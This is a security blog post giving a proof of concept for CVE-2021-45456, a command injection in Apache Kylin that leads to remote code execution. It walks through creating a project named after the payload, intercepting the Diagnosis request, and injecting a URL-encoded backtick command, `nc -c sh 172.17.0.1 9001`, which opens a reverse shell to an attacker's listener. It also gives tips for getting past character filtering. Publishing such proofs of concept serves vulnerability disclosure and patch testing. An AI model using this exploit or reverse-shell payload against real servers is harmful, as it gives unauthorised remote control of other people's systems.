Login
Start Free Trial
Back

CVE-2021-45456: Apache Kylin RCE PoC

Apr 26, 2023

Introduction

Command injection in #Apache Kylin has been found and registered as #CVE-2021-45456, in vsociety we managed to leverage it to RCE and create PoC.

Analysis for this CVE is coming soon, so stay tuned to understand more in-depth about how this vulnerability works.

Proof of concept

  • Add a project

  • No characters are allowed except _ , therefore the name of the project is based on the payload but stripped from characters as follows:


    my payload is nc -c sh 172.17.0.1 9001 so the project name is nccsh17217019001




  • Go to "System"

  • Turn proxy on

  • Click "Diagnosis" and intercept the request


  • Send it to the repeater and drop this request

  • The payload after encoding %60nc%20%2dc%20sh%20172%2e17%2e0%2e1%209001%60


    The decoded payload

    `nc -c sh 172.17.0.1 9001`


  • Replace the project name with the encoded payload


  • Run the listener and send the request



NOTES

  1. Adding any / encoded or not in the payload will not work. Check the analysis on vsociety for more information.

  2. You need permission to create a project, so the name of the project can be based on the payload.

  3. The exploitation will not succeed if the project name is modified by adding any additional letter to the payload in the request.

  4. The ip and port should be part of the name, the IP without . and you add the dots . later as URL encoded.

Command injection in Apache Kylin has been found and registered as CVE-2021-45456, in vsociety we managed to leverage it to RCE and create PoC.

Tags

  • #APACHE

  • #CVE-2021-45456

  • #vicarius_blog

users/photos/cl9eol3ua2l7i0llg9fft6uoq.jpg

Written by

Mohammad Hussam Alzeyyat

Recent Posts

  • 1

    Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)

    j00sean (https://twitter.com/j00sean) July 11, 2023

  • 2

    CVE-2021-38294: Apache Storm Nimbus Command Injection

    Zeyad Abdelazim June 20, 2023

  • 3

    CVE-2023-21931 & CVE-2023-21839 RCE via post-deserialization

    Mohammad Hussam Alzeyyat June 19, 2023

  • 4

    Have you missed them? The new reports feature is here!

    Noa Machter May 14, 2023

  • 5

    CVE-2021-45456 Apache Kylin RCE Exploit

    Mohammad Hussam Alzeyyat April 30, 2023

Related Posts

By Akos Jakab
Sep 13, 2023

CVE-2023-27524: Authentication Bypass in Apache Superset - exploit

Exploit script to run any OS command or connect back to your reverse shell on both the database server and Superset server.
By Akos Jakab
Sep 11, 2023

CVE-2023-27524: Authentication Bypass in Apache Superset

Apache Superset versions up to and including 2.0.1 are susceptible to a critical session validation vulnerability.
By Akos Jakab
Aug 09, 2023

SQL injection in Apache Airflow MySQL provider (CVE-2023-22884)

In this CVE analysis I try to investigate a critical security flaw identified within Apache Airflow as **CVE-2023-22884**.
last_chanse_02.png

Start Closing Security Gaps

  • Risk reduction from Day 1
  • Fast set-up and deployment
  • Unified platform
  • Full-featured 14-day trial
Start Free Trial!